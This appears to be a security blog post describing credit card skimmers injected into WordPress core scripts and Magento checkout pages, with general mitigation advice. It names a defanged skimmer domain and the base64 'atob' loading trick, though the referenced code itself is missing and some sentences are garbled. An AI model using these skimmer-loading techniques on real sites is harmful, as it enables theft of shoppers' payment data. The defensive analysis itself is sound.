When we talk about Malware attack that steals critical data from websites, the first thing that comes to mind is Magento or other e-commerce websites. We often forget WordPress also has a decent share in the e-commerce sector.
Therefore, it is crucial that while discussing credit card skimmers like Magecart, we include both WordPress and Magento along with other ecommerce CMS. There are many plugins that help you turn your WordPress website into an online store.
One such plugin is WooCommerce which alone has over 5 million installations.
Credit Card Skimmer Injected in WordPress Core
Plugins are one of the most common causes of malware infection. One of the examples of malware found in the WordPress core files wp-includes/js/wp-util.min.js and wp-includes/js/admin-bar.min.js is given below:-
Both the core files had the following injected code, present in the beginning.
This injected code is a typical credit card skimmer, with “e.src=atob” containing the encoded URL of the external script.
Typical Malware Skimmers Found on Magento
We often find these types of injection scripts on magento websites. They use obfuscated atob (base64) variation, as well as hundreds of different domains and custom URLs.
For example, on a magento website we find almost the same copy of the splitter script (quoted above) with only minor changes.
This variant loads skimmer from hxxps: //zendesk- chart [.] com/uk/google.js (not /top/aco.js), which works with payment forms for that particular site.
Multiple versions of credit card theft that can be found in nature injected on various e-commerce sites.
How to mitigate malware attack?
Obviously, this is definitely not a fully automatic massive infection, hackers have a unified solution (list of vulnerabilities and payloads) that fits all scenarios. Each script has a custom name and content for each particular committed site.
In this malware activity, detect the payment page URL for each destination. From there, the custom code works by collecting confidential credit card information from the victim’s payment form.
Malware itself is agagnisy CMS – it does not matter whether a website uses magento, WordPress or any other type of e-commerce CMS. If there is a form that accepts payment details, and can be hacked, nothing prevents the bad actor from installing a skimmer there.
E-commerce website owners should take the security of their website very seriously, as they are ultimately responsible for any breach of customer data resulting from online store transactions.
Particular attention should be paid to improving and monitoring web pages and server resources. Perform regular security scans of your web assets for malware and other damage metrics.